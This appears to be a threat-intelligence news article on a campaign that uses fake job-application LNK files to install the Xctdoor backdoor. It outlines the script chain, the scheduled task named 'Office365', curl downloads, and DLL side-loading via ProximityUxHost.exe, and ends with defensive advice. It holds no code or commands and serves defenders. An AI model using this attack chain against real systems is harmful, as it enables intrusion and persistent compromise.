Cybercriminals are increasingly targeting corporate employees by distributing malicious LNK files disguised as legitimate job application documents. When unsuspecting users open these files, they inadvertently initiate a stealthy infection process that deploys the Xctdoor backdoor, granting attackers persistent access to compromised systems.
The attack leverages common Windows scripting tools—PowerShell, VBScript, and batch files—to execute its payload. Upon opening the deceptive LNK file, a series of scripts with randomly generated names are created in the system’s public directories. These scripts work in concert to establish a scheduled task named “Office365,” which runs a VBScript file every ten minutes, ensuring the malware’s continuous operation.
Further analysis reveals that the PowerShell script downloads additional components from an external server using the curl command. Some of these components are Base64-encoded and, once decoded, are saved as additional PowerShell scripts in the system’s public directories. A subsequent script creates a startup shortcut and decrypts the downloaded files to produce an executable, a DLL file, and supporting data files.
To evade detection, the attackers employ DLL side-loading techniques. They launch a legitimate program, ProximityUxHost.exe, which in turn loads a malicious DLL named ProximityCommon.dll. This method allows the execution of harmful code while maintaining the appearance of normal system operations.
The Xctdoor backdoor is designed for long-term access, communicating with an external command and control server to execute remote commands. Its persistence mechanisms ensure that the malware survives system reboots, maintaining the attacker’s foothold on the infected machine.
This campaign poses a significant threat to organizations, particularly departments that frequently handle external documents, such as human resources, sales, and customer support. The use of seemingly innocuous job application files increases the likelihood of successful infection, as employees may open these files without suspicion.
In the broader context, this attack underscores the evolving tactics of cybercriminals who exploit legitimate system tools to deploy malware. By abusing built-in scripting capabilities like PowerShell and VBScript, attackers can execute malicious code without triggering traditional security alerts. This trend highlights the need for organizations to implement advanced threat detection mechanisms that can identify and mitigate such sophisticated attacks.
To defend against these threats, organizations should educate employees about the risks associated with opening unsolicited attachments, even those that appear to be legitimate. Additionally, implementing security solutions that monitor and control the execution of scripts can help detect and prevent the deployment of backdoors like Xctdoor.
